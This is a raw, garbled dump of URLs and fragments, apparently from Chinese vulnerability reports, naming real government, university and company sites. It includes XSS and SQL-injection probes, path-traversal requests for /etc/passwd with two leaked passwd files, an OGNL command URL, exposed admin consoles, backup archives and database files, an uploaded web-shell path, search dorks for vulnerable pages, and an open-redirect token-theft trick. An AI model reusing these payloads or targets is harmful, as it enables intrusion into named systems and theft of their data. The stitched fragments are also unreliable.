http://www.sxth.gov.cn/sxyx/changhang.aspx?id=19339 http://sclz.lss.gov.cn/template/default/newslist.jsp?classId=8a22804434c19b5f0134d0bdb4b0002a http://bz.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://www.tljw.gov.cn/article.php?MsgId=91231 http://nsrxx.hazz-l-tax.gov.cn/nsrxx/list/spbf.do?b_spbf=true&spid=27 http://www.phbi.gov.cn/readnews.asp?id=4213 http://www.xnyf.gov.cn/news_more.asp?lm=73 http://www.nmgmr.gov.cn/search.jsp?title_content=all&keyword= http://people.nbfet.gov.cn/hyzsxi.php?id=519 http://www.qzrf.gov.cn/cjwtlist.aspx?t=1 http://fzb.ahsz.gov.cn/openxw.asp?id=41041 http://www.bjszfj.gov.cn/newlist.php?id=5 http://md.dali.gov.cn/article_show_mdgk.asp?articleid=24215 http://www.gxwater.gov.cn/Publish/Reservoir/ReservoirDailyOperation.aspx?ENNMCD=&bgTime=&edTime= http://211.137.180.20:19010/jmx-console/ http://211.137.180.20:19010/admin-console/login.seam?conversationId=269 http://211.137.180.20:19010/iswin/ http://cloud.bbn.com.cn/business/business_detail.jsp?id=401 http://cloud.bbn.com.cn/business/business_detail.jsp?id=309 http://ti.qq.com/remind/view_pc.html?_wv=1027&rid=18980287&rtype=group&src=tips&ADUIN=(QQ号码)&ADSESSION=1404886086&ADTAG=CLIENT.QQ.5335_.0&ADPUBNO=26366 http://www.jsspzx.gov.cn/JsWeb/bsxz/ShowDetailInfo.jsp?xmId=1301 http://219.140.193.253/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA& http://weixin.51web.com/LoginAction!index.action?debug=command&expression="U_U"& http://u.xunzai.com/app/1.txt http://hyfw.12306.cn/hyinfo/action/JgxxAction_index?type=%3C/script%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://hyfw.12306.cn/hyinfo/action/ClcscxAction_index?cllx=%22aaa%22%20onload=%22alert%281%29%22%20/ http://developer.baidu.com/rest/2.0/dev/v1/app/base/list2?callback=jQuery110100413025302879616_1404913266218&pn=1&ps=10&od_by=create_time&sort=asc,注入点&access_token=TOKEN&_=1404913266225 xxx.com/XT/Accounts/User_Management/ModifyUser.aspx?UserID=admin http://agri.suning.com.cn/NewsDetail.php?id=293&t=0 http://www.koolearn.com/downloadservlet?type=1&download=2013-10/yasijjchtl.doc http://222.45.224.106:8888/moblie/login.action jdbc:oracle:thin:@122.70.129.72:1521:smartdb root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin Tomcat:x:91:91:Tomcat:/usr/share/tomcat5:/bin/sh oracle:x:500:500::/home/oracle:/bin/bash http://office.focus.cn/group/recordvote.php http://www.cmseasy.org http://www.cmseasy.org/faq.php?action=grouppermission http://www.renren.com/161125632/profile http://status.renren.com/status/v7/,后面添加上uid http://status.renren.com/status/v7/161125632 http://www.snds.gov.cn:99/i/oem/grpslogin.jsp www.snds.gov.cn:99 http://www.snds.gov.cn:99 http://as.baidu.com/a/item?docid=6662298&pre=web_am_rel&pos=item_3004_0&f=hao%40item_3004_0_76679 http://office.focus.cn/vote/brand_intro.php?brand_id=213 http://wsxf.hbzw.gov.cn:8001/ http://wsxf.hbzw.gov.cn:8001/outLogin.qd ID:lihongzhong http://efax.sdtele.com/login.jsp http://www.syzsks.cn/Admin/Account/ http://www.gd315.gov.cn/z.asp http://www.dixintong.com/activityshow.aspx?aId=660 www.sh.com http://hr.gzmtr.com/doLogin.do http://183.62.35.210:8081/gzdtss/SS2012/PortalLogin.aspx http://2013.gzmtr.com/job/person/login.jsp http://www.xinyangedu.gov.cn/web.rar http://ueditor.baidu.com/website/download.html#ueditor(软件下载地址) http://ueditor.baidu.com/build/build_down.php?n=ueditor-list.zip http://ueditor.baidu.com/build/build_down.php?n=(这里填写文件路径和文件名) http://www.dooland.com/magazine/special/mo http://w.zuzuche.com/order.php?order_id=HD123456789 http://w.zuzuche.com/order.php?order_id=HD709141256 http://www.qishi.gov.cn/lm_dwgk/list.asp?gType=100 http://www.qishi.gov.cn/lm_dwgk/details.asp?gArtId=1109 http://www.qishi.gov.cn/lm_dwgk/admins/admin.asp http://www.0370qd.com/index.html http://211.137.10.117 http://yao.xywy.com/index.php?a=search&keyword= http://dealer.yaofang.cn/dealer/show_log http://www.dooland.com/magazine/special/dedecms/mag_update.php?id=49 http://www.dooland.com/magazine/special/dedecms/fabu_mag_list.php http://119.7.222.212:9090/monitor http://119.7.222.212:9090/monitor/%5b2014-7-09%5d/ http://121.9.213.10/wap/b.php?id=1099 http://sqlmap.org http://www.dooland.com/magazine/special/sp http://www.baidu.com/s?wd=inurl%3AShowInfo.aspx%3FPNodeNum&pn=130&oq=inurl%3AShowInfo.aspx%3FPNodeNum&ie=utf-8 xxx.com/JX/SZGL_jx11/YWGL/ByTeacher/SZGLEdit.aspx?ZGH=0001 http://dm.2144.cn/comic/9275【注入点】/717【注入点】.html site:http://dm.2144.cn/ inurl:type http://52shuke.com http://mgr.yaofang.cn/ http://dealer.yaofang.cn/ http://zb.upc.edu.cn/classify.asp?cate=1 http://xmgl.gzsmzt.gov.cn/ http://gkpj.scnu.edu.cn/ http://117.78.1.167/ xxx.com/XT/Accounts/Role_Management/Add_Role.aspx?RoleID=js101 xx.com/BG/TXL/TxlDetail.aspx?ID=1 xxx.com/BG/ToDo/ToDoDetail.aspx?ID=1 http://www.datacarrier.cn/ http://www.hnidcard.com/lawgistShow.jsp?opid=493 http://www.hnidcard.com/lawgistShow.jsp?opid=493 http://www.hnidcard.com/lawgistShow.jsp?opid=493 http://www.wowsai.com/index.php?app=shopping&act=custom&id=5 http://authoritysys.bjcc.gov.cn http://hwa.happigo.com/backup.tar.gz http://jipiao.uzai.com/ http://graschool.bjmu.edu.cn/EmploymentWeb/zxgg.aspx?id=2537 http://www.phpmps.com/down/phpmps_v2.3_build140305_utf8.zip http://www.phpmps.com/demo/admin/login.php http://www.hztdjt.com/tdoa/ http://www.hztdjt.com/tdoa/Default.aspx http://x.x.x.x/hrss/rm/ResetPwd.jsp http://59.173.0.46:8090 http://www.chinaqhd.cn http://fp.gy12366.cn/ http://xjd.tcl.com/showclick.asp?guid=20130422184740176 http://lighting.tcl.com/cn/news-d.aspx?ID=410&SortID=80 callcenter.tcl.com/tclcc/portlets/Examine/begin.do?form_id=3 http://erp.winta.net/xtrpm/default.aspx鑫塔集团房地产项目管理集成系统 http://www.rainbowcn.com/lks/sys/lks_public.nsf/ http://112.64.171.134:8001/ http://112.64.171.134:8001/Service1.asmx http://112.64.171.134:8001/Manager中可以查看到后台目录的完整架构 http://112.64.171.134:8001中下载了数据库链接信息的文件和内网共享地址的文件 http://drops.wooyun.org/papers/1404 xxx.com/XS/XSSX/PracticeRule/PracticeRuleEdit.aspx?RuleID=2 http://112.81.51.120:8080/tcbi/secure/login.action http://www.fengcms.com http://www.yytingting.com/profile/anchor.jsp?userId=62724553 http://121.29.220.23:8080/wf/login.action xx.com/XS/XSSX/PracticeWorkPlan/PracticeWorkPlanEdit.aspx?PlanID=1 http://58.214.233.113:8800/lmsv5/ http://60.216.4.162:9091/lmsv5/ http://www.xysyxx.com.cn/oa/default.asp http://oa.hbzyy.org/default.asp http://oa.hbzyy.org//db/lmtof.mdb http://211.137.13.217/main/zcfg.asp?adclass=9 http://www.xcdafz.gov.cn/ http://www.xcdafz.gov.cn/admin/Login.asp http://newsadmin.yiban.cn/ http://admin.yiban.cn/ http://www.chinagrains.org.cn/new/industry/newsview.asp?id=1存在SQL注射漏洞,hash密码可以爆破 http://115.182.51.140/html/encoder/index.html http://113.108.109.39:8089/ http://guf521656.h163.92hezu.org/index.php?controller=down&file=L3VwbG9hZC9cLi5cY29uZmlnLnBocA== http://125.67.235.94:8080/issp/pages/login.action http://www.lzdfzf.gov.cn/zgAdmin/ http://www.jlxw.gov.cn/zgAdmin/ http://www.codoon.com/verify_email?email=邮箱地址&code=时间戳 http://www.codoon.com/verify_email?email=邮箱地址&code=2838 http://www.codoon.com/verify_email?email=邮箱地址&code=2840 http://jgxs.njau.edu.cn:8011/ad_Index.asp http://jgxs.njau.edu.cn:8011/info_Print.asp?ArticleID=210 http://115.238.166.123:8081 http://wooyun.org/bugs/wooyun-2014-050728思路大致相同! http://house.focus.cn/common/yaohao/checkkh.php?yh_id=257&kh= https://180.169.55.153/login!login.action https://180.169.55.153/login!login.action http://218.193.51.132:8080/Lims/Login.action http://218.193.51.132:8080/Lims/Silic.jsp http://x:8080/aicberm/loginAction!login.action http://211.142.39.96:8080/aicberm/Silic.jsp http://www.sq315.gov.cn/ http://testportal2.ceair.com/ http://i.fun.tv http://www1.jiande.gov.cn/web/CFCount/%E4%B9%98%E9%A3%8E%E7%A8%8B%E5%BA%8F%E5%AE%89%E8%A3%85%E8%AF%B4%E6%98%8E.txt http://www.qqcf.com http://www.qqcf.com/?action=list&list=cfcount http://www1.jiande.gov.cn/web/CFCount/Admin.asp http://www.ahpost.com.cn/com/view.php?boardid=2 http://www.ahpost.com.cn/com/viewnews.php?newsid=5121 http://www.ahpost.com.cn/com/view.php?boardid=2&setid=0%20boardid=2%20amd%201=2 http://www.ahpost.com.cn/bbs/ http://www.xian3g.com/P/msi.aspx?TitleName=PPSS&SInfo= http://h.bilibili.com/search?keyword=%27 http://goto.mail.sohu.com/admin/user.tar http://m.yy.com/live/swf/Shareobject.swf?v=1.1 http://m.yy.com/live/1980062727/ http://admin.dooland.com/test/news/admin.php http://www.gsciq.gov.cn/manage/MagLogin.asp http://www.fwwb.gov.cn/pages/Page.html http://fwwb.fwmys.mofcom.gov.cn/login.html http://rjck.fwmys.mofcom.gov.cn/login.html http://fwwbqy.fwmys.mofcom.gov.cn/login.html http://www.cnoa.cn http://127.0.0.1/index.php?app=news&func=news&action=view&task=desktoplist&sid=1&_dc=1405133386843 http://127.0.0.1/index.php?app=news&func=news&action=view&task=desktoplist&sid=1&_dc=1405133386843可得到结果 http://127.0.0.1/index.php?app=news&func=news&action=view&task=desktoplist&sid=1&_dc=1405133386843 http://127.0.0.1/index.php?app=news&func=news&action=view&task=desktoplist&_dc=1405133386843&sid=1 http://127.0.0.1/index.php?app=news&func=news&action=view&task=desktoplist&_dc=1405133386843&sid=1 http://211.151.121.183:9200 http://www.yoybuy.com/cn/ gz.focus.cn/vote/brand_intro.php?brand_id=46 house.focus.cn/vote/brand_intro.php?brand_id=67 dl.focus.cn/vote/brand_intro.php?brand_id= house.focus.cn/vote/brand_intro.php?brand_id=3 bjmsg.focus.cn/vote/brand_intro.php?brand_id= hz.focus.cn/vote/brand_intro.php?brand_id=19 qhd.focus.cn/vote/brand_intro.php?brand_id= sh.focus.cn/vote/brand_intro.php?brand_id=50 dg.focus.cn/vote/brand_intro.php?brand_id=97 office.focus.cn/vote/brand_intro.php?brand_id= http://www.ggj.hbjt.gov.cn/ggj/news/listNews.jsp?artColumn=0302010201 http://q.letv.com/question/1925 http://www.csndmc.ac.cn/newweb/secondpage.jsp?id=1440 http://111.10.24.94/main.aspx?Id=1&groupId=4 http://cpaexam.cicpa.org.cn/ArticleMngAction.do?filePath=/../../../etc/passwd%00.jpg&method=downFile root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin ricci:x:140:140:ricci user:/var/lib/ricci:/sbin/nologin cicpa:x:500:500::/home/cicpa:/bin/bash weihu:x:501:501::/home/weihu:/bin/bash http://www.9555168.com/list.php?cat=24 http://111.10.24.146/list.php?cat=24 http://sqlmap.org http://nms.qq.zen-game.com http://zabbix.zen-game.com http://dwgk.cnu.edu.cn/editortpxx/upload.jsp http://183.63.149.105:9200服务器ElasticSearch命令执行漏洞 http://119.147.42.45/ http://119.147.42.45:9090/web-console/ http://gbbs.gsta.com http://www.pkpm.cn/】,公司开发的专用于工程监督的内容管理系统存在多个注入漏洞,可以这么说:到处都是注射漏洞啊!前人也有提交过,不过前人提交的只是单纯的一个注射漏洞,这里提交不重复多个注入漏洞吧: https://wen.lu/search?biw=1024&bih=663&noj=1&q=inurl%3AInfoValue.aspx%3Fid%3D&oq=inurl%3AInfoValue.aspx%3Fid%3D&gs_l=serp.3...5914.8010.0.8245.8.7.1.0.0.0.233.1203.0j6j1.7.0....0...1c.1j4.48.serp..8.0.0.-CfJcmMLbm0 http://jlxzxk.zjbts.gov.cn:93/UserManage/UserApply.aspx http://tishow.dota2.com.cn/ http://tishow.dota2.com.cn/index.php?m=Index&a=down&path=../../../etc/passwd http://219.143.252.160/Product/product_list.aspx?MenuID=010301 http://bbs.snwh.gov.cn/ http://www.shop7z.com/Demo/order_checknoprint.asp?checkno=1&id=1 http://125.62.63.7/ http://125.62.63.7/general/crm/apps/crm/include/dele http://sqlmap.org http://125.62.63.229:81 http://www.chinawutong.com/ashx/rediec http://cdc.cma.gov.cn/dataSetDetailed.do?changeFlag=dataLogger&dsId= http://library.cma.gov.cn:8082/phpstat/server_counts_json.php?artid=49112 http://wisportal.cma.gov.cn/wis/jsp/DataQuery/queryMetaDataXML.dhcc?PID= http://wisportal.cma.gov.cn/wis/jsp/googleMap/DataXML.dhcc?PID= http://qk.cams.cma.gov.cn/jams/ch/index.aspx?year_id=2014&quarter_id=3 http://202.195.176.29/gmis/login.aspx inurl:show.asp?id= https://www.google.com.tw/?gws_rd=ssl#newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:%E7%9B%9B%E4%B8%96%E5%BD%A9%E8%99%B9+inurl:show.asp%3Fid%3D&start=20 http://quan.sohu.com/api/redirect?url=,这个网址存在随意跳情况。 http://quan.sohu.com/api/redirect?url=http://weichch.apphb.com/qq?clientid=100327010%23。结尾用了一个URI编码的hash,因为腾讯会把编码的hash变为真正的hash,然后让一个可以传到server的URL顺理成章的变成了浏览器行为,不会被server捕捉到的hash。此问题已经反映给腾讯,不过腾讯那帮sb似乎不认为这是bug。那就让他公开吧。 http://www.shop7z.com/Demo/order_print.asp?id=1 http://gh.cmge.com/game/view/id/6* http://202.113.20.120 http://202.113.20.120/admin/edit_localuser.php?UserId=3802&TableName=AllUser http://202.113.20.120/include/common.ini http://202.113.6.228/ http://125.62.63.64/ http://125.62.63.64/conn.inc http://58.54.134.248/TeachView.asp?id=21%27 http://www.dcqdssyxx.com/TeachView.asp?id=22%27 http://www.zcvc.cn/dgb/StudentView.asp?id=13%27 http://www.tajx.com/TeacherView.asp?id=12%27 http://118.112.184.98:90/NewsView.asp?id=35%27 http://www.tajx.com/Newsview.asp?id=20%27 http://www.yjsdszx.com/NewsView.asp?id=31%27 http://www.zhwdxx.com/NewsView.asp?id=11%27 http://www.sxtjxx.net/TeachView.asp?id=13%27 http://www.yrenedu.com/MoralsView.asp?id=21%27 http://www.sxtjxx.net/Newsview.asp?id=29%27 http://www.tajx.com/TeacherView.asp?id=12 http://sqlmap.org http://wooyun.org/bugs/wooyun-2014-055776 https://202.112.42.186/ http://tj.7daysinn.cn/contrib/security/pages/login.aspx http://tj.7daysinn.cn/contrib/security/pages/register.aspx http://graduate.nbu.edu.cn/ http://5156edu.com http://user.5156edu.com/register1.php?f_username=hackev1l http://www.aviva-cofco.com.cn https://gps.aviva-cofco.com.cn/CardAgent/common/cvar/CExec.jsp http://try.mama.cn/notice.php?id=184 http://oa.syc.com.cn/oa/fckeditor/editor/filemanager/connectors/test.html http://oa.syc.com.cn/SITE_KGJ_WEB/uploadfile/201407/file/%5C/2014071310101619.asp http://www.eee.cn/manager.do http://www.baidu.com/s?wd=2008-2014%20点威科技%20版权所有&rsv_bp=0&tn=baidu&rsv_spt=3&ie=utf-8&rsv_n=2&rsv_sug3=1&rsv_sug4=27&inputT=1078 http://222.179.90.110:81/control/uia/access.do http://58.42.230.66:8081/control/uia/access.do http://www.nzzj.com:8888/control/uia/access.do http://220.164.63.27:8868/control/uia/access.do http://221.232.139.94:8080/control/uia/access.do http://www.sglr.gov.cn/other/apply.asp http://www.wuhanja.jcy.gov.cn/setup/adminlogin.asp http://www.cysl.gov.cn/news/admin/admin.asp inurl:inquiry.php http://v5.demo.cutecms.cn/news/admin/fckeditor/editor/filemanager/connectors/uploadtest.html http://www.hbfys.cn/admin/fckeditor/editor/filemanager/connectors/uploadtest.html http://www.500wpc.com/admin/fckeditor/editor/filemanager/connectors/uploadtest.html http://www.ke-sen.com/admin/fckeditor/editor/filemanager/connectors/uploadtest.html http://nh.traderen.net/admin/fckeditor/editor/filemanager/connectors/uploadtest.html http://www.scfae.com/ http://www.hiall.com.cn/ http://jpkc.zzti.edu.cn/Announcement/Announcement.asp?AnnounceId=5 http://ywxk.heuet.edu.cn/show.jsp?id=36 http://finance.whu.edu.cn/web3/content.aspx?lb=zc http://jrxy.zufe.edu.cn/index.jsp?urltype=tree.TreeTempUrl&wbtreeid=1957 http://cartoon.twt.edu.cn/sub_fanzu.php?id=308 http://bec.jnu.edu.cn/Dynamicindex.aspx?type=4 http://news.sdp.edu.cn/show_news.php?id=4314 http://jdx.hnzj.edu.cn/about.asp?classid=14 http://balis5.ustb.edu.cn/notice/notice_List.aspx?type=0 http://zs.chenggong.edu.cn/NewsDetail.asp?id=404 http://ssp.lib.sjtu.edu.cn/browse.php?o=l http://gggl.ncu.edu.cn/list.asp?cate=A0013 http://sics.ynnu.edu.cn/articleview2.aspx?id=648 http://yuanban.sqnc.edu.cn/showcontent.php?id=390 http://jrxy.lixin.edu.cn/default.php?mod=article&settype=0&fid=39 http://lib.haut.edu.cn/ResourceList.aspx?SectionId=1926e339-3699-4118-89e4-074ed0bf6ea6 http://acad.cumt.edu.cn/View.aspx?id=1357 http://hqjt.xidian.edu.cn/Logistics_talent.asp?bh=578&id=35 http://jy.qhnu.edu.cn/admin/manager/admin_voting_show.php?page_id=14 http://sope.ruc.edu.cn/more.php?cid=253 http://qzlx.hue.edu.cn/index.php?action=list&id=91 http://library.qust.edu.cn/articleshow.asp?ArticleID=195 http://sklppb.cau.edu.cn/Tplatform.asp?ID=1 http://jijian.qjnu.edu.cn/showArt.asp?id=892 http://cjy.qfnu.edu.cn/look_skip009.asp?yiid=10 http://tpxy.usts.edu.cn/tpxsc2013/news/news_more.asp?lm2=5 http://jjglx.hbsi.edu.cn/read.asp?id=737 http://studyatsyu.syu.edu.cn/yu.asp?id=172 http://gdsz.scnu.edu.cn/news.asp?type=15 http://eng.zjiet.edu.cn/list.asp?pid=165 http://lntgw.lnu.edu.cn/info.php?num=161 http://xinquban.henau.edu.cn/onews.asp?id=770 http://xtck.bistu.edu.cn/ShowNews.aspx?NewsId=27 http://jxms.dgut.edu.cn/mingshi.asp?m=songy http://1y.nuc.edu.cn/Detail_Img.aspx?kind=86&parent=84 http://lib.glmc.edu.cn/news/Play.asp?id=521 http://jpkc.sdau.edu.cn/new2/content.aspx?type=wjjs&id=2 http://www.gsee.edu.cn/zxmt_list.jsp?urltype=tree.TreeTempUrl&wbtreeid=1005 http://tw.lixin.edu.cn/default.php?mod=article&fid=1 http://library.wit.edu.cn/qaonline/display.asp?id=79 http://huiwenhua.ahu.edu.cn/list.php?act=news http://zj.gcvtc.edu.cn/Class.asp?C=1 http://lib.cumtb.edu.cn/CommonQusetion.aspx?SectionId=3c369f17-81db-48c6-8b8f-be12707a99f5 http://yzw.gdut.edu.cn/list.php?typeid=156 http://hos.nenu.edu.cn/culture.asp?id=4 http://jiuye.sxufe.edu.cn/class.asp?id=55 http://zb.yctc.edu.cn/EC_Usercenter.asp?action=Userinfo&id=3230 http://en.tmmu.edu.cn/pages/info.aspx?id=19df0793-1a83-42a4-afdc-5791c51fd134 http://szb.dgut.edu.cn/class.asp?id=51 http://mba.njfu.edu.cn/news_list.asp?id=88 http://zytx.eszy.edu.cn/site_pages/shownews.asp?id=80 http://rccsh.sxu.edu.cn/class.asp?classid=69 http://sxc.zjc.edu.cn/photolist.asp?classid=7 http://fund.tongji.edu.cn/down.asp?id=13 http://rwjd.zjgsu.edu.cn/content/detail.php?sid=23&cid=514&id=1006 http://zihuan.swu.edu.cn/list.php?bid=13 http://bbg.henau.edu.cn/NewsDetail.asp?id=993 http://tw.lnist.edu.cn/column.asp?id=1 http://yjs.wit.edu.cn/rule_detail.asp?ParentID=2&News_ID=999 http://www.hq.tzc.edu.cn/boardnews.asp?id=269 http://sunshine.zstu.edu.cn/weekly/index.php?r=site/photoshow&wid=54 http://bio.fjzs.edu.cn/news.asp?districtid=5 http://rwx.huat.edu.cn/dzgz.asp?bigclassid=58 http://zjc.ccucm.edu.cn/jiuye.php?m=Content&a=show&id=557 http://fzsbcg.sqnc.edu.cn/more.asp?classid=67 http://inta.ep.tsinghua.edu.cn/news/g_show.asp?id=1020 http://tisc.cfau.edu.cn/studio/gsjj.asp?sort=1&id=1 http://wxy.lcu.edu.cn/m_list.asp?id=105 http://www.ans.ustc.edu.cn/list.php?catalog_id=41 http://wzpb.hist.edu.cn/pbjg.jsp?urltype=survey.SurveyStatisticUrl&wbtreeid=1001&surveyid=1008 http://sj.media.edu.cn/index2.php?ID=13 http://gs.dlut.edu.cn/showmorepeiyang_zhengce.asp?deptsortName_zhengce=%E5%AD%A6%E7%B1%8D%E7%AE%A1%E7%90%86&NewsDeptSortSort=3201 http://wlxh.zjiet.edu.cn/Sort.asp?SortID=42 http://www.gonghui.sdu.edu.cn/issue/admin/show_table.php?tableid=32 http://cwcx.muc.edu.cn/LawChildList.aspx?zc_class=1001 http://xxgc.wzmc.edu.cn/download.aspx?cateId=7 http://youth.njfu.edu.cn/info.php?id=22 http://zz.qhnu.edu.cn/admin/manager/admin_voting_show.php?page_id=13 http://est.dlut.edu.cn/showCallBoard.asp?zid=17 http://iics.lzu.edu.cn/iics/main_docs.aspx?pID=wz01100028 http://mba.cau.edu.cn/invest.php?tid=1 http://gjjl.sdp.edu.cn/Content.aspx?id=25 http://shuxue.sqnc.edu.cn/shownews.asp?newsid=2248 http://www.ceu.zju.edu.cn/itpeceu/itpe_cn/newsdetaile.asp?ID=489 http://yjsb.tjpu.edu.cn/build.php?sortid=11 http://kjcw.lixin.edu.cn/default.php?mod=article&fid=10 http://dfi.bnuz.edu.cn/article.php?id=10 http://www.hsit.edu.cn/news/list.asp?listid=73 http://lib.zzu.edu.cn/article_list.aspx?Paid=0be0481f-5927-43f9-8c89-4918c8fd448f http://jyzd.usts.edu.cn/lyb/index.asp?id=13361 http://tw.zjiet.edu.cn/showBulletin.asp?bulletin_ID=193 http://xkfw.nbu.edu.cn/main_pages.aspx?id=p_1 http://sme.xidian.edu.cn/college.asp?id=148 http://yjs.hbut.edu.cn/news_more.asp?lm=93 http://xinchuan.njnu.edu.cn/news.asp?id=410 http://www.dlrj.edu.cn/Details.aspx?infoId=85 http://www.gcvtc.edu.cn/lunwenshow.asp?id=90 http://bwc.huat.edu.cn/article.asp?id=113 http://www.bfamcmc.edu.cn/about/index.asp?id=17 http://gdjy.cumt.edu.cn/About.asp?id=12 http://bdyj.sdibt.edu.cn/bdsc.asp?type_id=ytjj http://cxzy.cumtb.edu.cn/info.php?id=301 http://psy.ruc.edu.cn/activityinfo.php?id=8 http://tuanwei.cueb.edu.cn/xueshenghui/news_show.asp?news_id=85 http://math.tongji.edu.cn/show.aspx?info_lb=7&flag=7&info_id=964 http://child.bnu.edu.cn/ShowNew.aspx?wid=4802 http://sice.cufe.edu.cn/en/sort.asp?dy1=SICE http://www.rsc.tzc.edu.cn/more.asp?boardid=10 http://xsc.hrbcu.edu.cn/showContent.php?id=277 http://pec.zzuli.edu.cn/show2.asp?type=%E4%BF%A1%E6%81%AF%E5%8F%91%E5%B8%83&id=227 http://heucfe.hrbeu.edu.cn/jxjyjd.aspx?name=jdjj http://office.nenu.edu.cn/info/info2.asp?id=3366 http://jjh.sdu.edu.cn/about2.php?id=3 http://xshxy.gxun.edu.cn/zhao/info/class.asp?id=4 http://kyc.nenu.edu.cn/res_ex_s.asp?nclass=15 http://www.csc.edu.cn/laihua/universitysearch.aspx?provinceId=13 http://xzb.lhmc.edu.cn/List.aspx?id=6 http://itd.hnfnu.edu.cn/tongxingongcheng/kwsj_detail.asp?id=57 http://www.hanqing.ruc.edu.cn/detail.php?class=news&iClassID=9&iInfoID=1764 http://jgy.swpu.edu.cn/DownQuery.aspx?id=1 http://www.cs.imnu.edu.cn/main/news/nsnews.php?id=1488 http://zs.havct.edu.cn/list.asp?id=75 http://zhwh.zzuli.edu.cn/Exchange.aspx?id=13 inurl:asp?newsId= https://www.google.com.tw/?gws_rd=ssl#newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:%E5%A5%87%E6%89%8D%E7%A7%91%E6%8A%80+inurl:asp%3FnewsId%3D&start=0 sn.189.cn/service/pay/payment.action?tab=bankCard,输完手机号(仅陕西电信)后出现了星号隐藏的姓名 http://bbs.lemote.com/ http://m.soufun.com/appspread.d?m=sweeperweima&id=8354&from=soufun&imei=868918689186891 http://www.chinavvv.com】开发的专门用于河南一带人民政府使用的系统存在通用SQL注射漏洞。此发现主要是根据前人的经验 http://64.233.***.***/search?q=inurl:index.jsp%3Fid%3D+inurl:name%3D+inurl:id_id&newwindow=1&hl=zh-CN&ei=ECzCU7DTOuiQ0AX0yYHQDA&start=20&sa=N&biw=1024&bih=663 http://211.142.**.*** http://www.chinavvv.com/viewCmsCac.do?cacId=4aef140927420fe60127753a80ec0162 http://www.850820.com/ http://www.magtech.com.cn/CN/model/index.shtml) http://61.177.182.148:8080/LTS/exam.action http://info.dg11185.com/card/registerAction.action http://news.jinyinmao.com.cn/ http://help.jinyinmao.com.cn/ http://www.scjg.com.cn/ http://www.scjg.com.cn/admin/Login.aspx http://chat.51kehu.com/ctrl/index.aspx?txUserName=1&txPassword=1 http://ba.72dns.com,登陆处POST注入,用户名 http://wooyun.org/bugs/wooyun-2014-065444 http://emlab.usst.edu.cn/model/TwoGradePage/CIntroduce.aspx?columnId=7 http://app.sohu.com/topic/info?topic_id=29 http://datamarket.baidu.com/web/app.html#app/index inurl:enterprise-info!getCompanyInfo.action 